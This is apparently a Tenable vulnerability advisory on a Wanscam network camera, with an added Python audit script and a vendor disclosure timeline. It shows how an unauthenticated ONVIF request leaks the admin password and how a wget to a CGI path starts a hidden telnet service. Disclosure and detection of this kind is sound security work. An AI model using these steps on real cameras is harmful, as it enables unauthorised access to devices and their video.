
[R1] Wanscam Network Camera Multiple Vulnerabilities

Medium

Synopsis

While investigating Pierre Kim's disclosure, "Multiple vulnerabilities found in Wireless IP Camera (P2P) WIFICAM cameras and vulnerabilities in custom http server", Tenable came across a couple of vulnerabilities in Wanscam's HW0021 network camera. These vulnerabilities sound similar to a couple of vulnerabilities F-Secure encountered in Foscam devices. It's unclear to Tenable how Foscam and Wanscam are related.

CVE-2017-11510: Administrator Username and Password Disclosure

The ONVIF protocol supports a method called GetSnapshotUri. This method returns a URL that links to the most recent camera snapshot. When the HW0021 replies to a remote unauthenticated user's GetSnapshotUri request it responds with a URL that includes the admin username and password. Here is an example from Nessus' ONVIF implementation:
LobsterTrap:plugin_dev albinolobster$ /Library/Nessus/run/bin/nasl -aWMXr -t 192.168.1.178 ./onvif_get_snapshot.nasl 
----------[ Executing onvif_detect.nbin ]------

The ONVIF service listening on UDP port 3702 advertises
the following information:

Endpoint: http://192.168.1.178:8080/onvif/devices
Name: IPCAM
Model: C6F0SeZ0N0P0L0

audit-trail:success: The service listening on port 3702 has already been identified.
----------[ Finished onvif_detect.nbin ]------
----------[ Executing onvif_get_endpoints.nasl ]------
The ONVIF server on port 8080 supports these services:

http://www.onvif.org/ver20/analytics/wsdl => http://192.168.1.178:8080/onvif/analytics
http://www.onvif.org/ver10/events/wsdl => http://192.168.1.178:8080/onvif/events
http://www.onvif.org/ver10/device/wsdl => http://192.168.1.178:8080/onvif/devices
http://www.onvif.org/ver20/imaging/wsdl => http://192.168.1.178:8080/onvif/imaging
http://www.onvif.org/ver20/ptz/wsdl => http://192.168.1.178:8080/onvif/ptz
http://www.onvif.org/ver10/media/wsdl => http://192.168.1.178:8080/onvif/media

----------[ Finished onvif_get_endpoints.nasl ]------
----------[ Executing ./onvif_get_snapshot.nasl ]------

It was possible to obtain a screenshot from the following URL
on the remote camera: 

http://192.168.1.178:80/web/auto.jpg?-usr=admin&-pwd=cheesedoodle&

----------[ Finished ./onvif_get_snapshot.nasl ]------
You can see the username (admin) and password (cheesedoodle) in the final plugin.
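As an added example (not part of Tenable's advisory or of the Nessus plugin shown above), the audit logic below parses a GetSnapshotUri SOAP response and flags any credentials embedded in the returned URL. The sample response is constructed to mirror the plugin output above; the credential parameter names beyond -usr/-pwd are an assumption.

```python
"""Audit check for credential leakage in ONVIF GetSnapshotUri replies (CVE-2017-11510 pattern)."""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit, parse_qsl

# The page shows -usr/-pwd; the other names are assumed variants seen on similar devices.
CREDENTIAL_PARAMS = {"-usr", "-pwd", "usr", "pwd", "user", "password"}

# Constructed sample modelled on the HW0021 reply shown in the advisory (not a real capture).
SAMPLE_RESPONSE = """<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"
            xmlns:trt="http://www.onvif.org/ver10/media/wsdl"
            xmlns:tt="http://www.onvif.org/ver10/schema">
  <s:Body>
    <trt:GetSnapshotUriResponse>
      <trt:MediaUri>
        <tt:Uri>http://192.168.1.178:80/web/auto.jpg?-usr=admin&amp;-pwd=cheesedoodle&amp;</tt:Uri>
        <tt:InvalidAfterConnect>false</tt:InvalidAfterConnect>
        <tt:InvalidAfterReboot>false</tt:InvalidAfterReboot>
        <tt:Timeout>PT0S</tt:Timeout>
      </trt:MediaUri>
    </trt:GetSnapshotUriResponse>
  </s:Body>
</s:Envelope>"""


def snapshot_uri_from_response(soap_xml: str) -> str:
    """Return the <tt:Uri> text from a GetSnapshotUriResponse, ignoring namespace prefixes."""
    root = ET.fromstring(soap_xml)
    for elem in root.iter():
        if elem.tag.rsplit("}", 1)[-1] == "Uri" and elem.text:
            return elem.text.strip()
    raise ValueError("no Uri element in GetSnapshotUri response")


def leaked_credentials(uri: str) -> dict:
    """Return credential-bearing parts of a snapshot URL (userinfo and known query keys)."""
    parts = urlsplit(uri)
    found = {}
    if parts.username or parts.password:
        found["userinfo"] = f"{parts.username}:{parts.password}"
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() in CREDENTIAL_PARAMS:
            found[key] = value
    return found


if __name__ == "__main__":
    uri = snapshot_uri_from_response(SAMPLE_RESPONSE)
    print("snapshot URL:", uri)
    print("leaked credentials:", leaked_credentials(uri) or "none")
```

A non-empty result from leaked_credentials means the camera hands its admin credentials to whoever can reach the ONVIF service, so the finding should be raised regardless of which password is configured.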

Hidden Telnet Functionality

Telnet is not enabled by default on the device. However, if an authenticated user visits /web/cgi-bin/hi3510/printscreenrequest.cgi then telnetd starts up.
[email protected]:~$ telnet 192.168.1.178
Trying 192.168.1.178...
telnet: Unable to connect to remote host: Connection refused
[email protected]:~$ wget --user admin --password labpass1 http://192.168.1.178/web/cgi-bin/hi3510/printscreenrequest.cgi &> /dev/null
[email protected]:~$ telnet 192.168.1.178
Trying 192.168.1.178...
Connected to 192.168.1.178.
Escape character is '^]'.

IPCamera login: 

Solution

A patch has not been published.

Disclosure Timeline

08/01/17 - Reached out to [email protected] for appropriate security related contact
08/03/17 - Lacking a response, attempted to establish communication via [email protected] [email protected] [email protected] and [email protected]
08/04/17 - Response from support asking me to fill out a Word document.
08/04/17 - Tenable not certain support understands. Tenable sends the disclosure information to clear things up.
08/06/17 - Support asks for a picture of the camera
08/06/17 - Tenable responds with a link to the camera on their website: http://www.wanscam.com/productshow-7-56-1.html - Somewhat concerned that they ignored the disclosure
08/08/17 - Support informs Tenable that we can change the username/password in the user settings
08/08/17 - Tenable responds that we understand that, but the system will still provide an unauthenticated user with the changed credentials
08/08/17 - Support replies with a confusing message. Lost in translation we think.
08/08/17 - Tenable reminds them that we sent PoC of the vulns.
08/09/17 - Support says they've never come across these issues
08/16/17 - Tenable asks them to confirm if they tried the proof of concepts
08/17/17 - Support tells Tenable that you can change the password and dev says there is no telnet functionality
08/17/17 - Tenable reminds support that it doesn't matter if the password is changed and we've provided proof there is telnet functionality. We are kind of going in circles here.
11/10/17 - Advisory published

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]
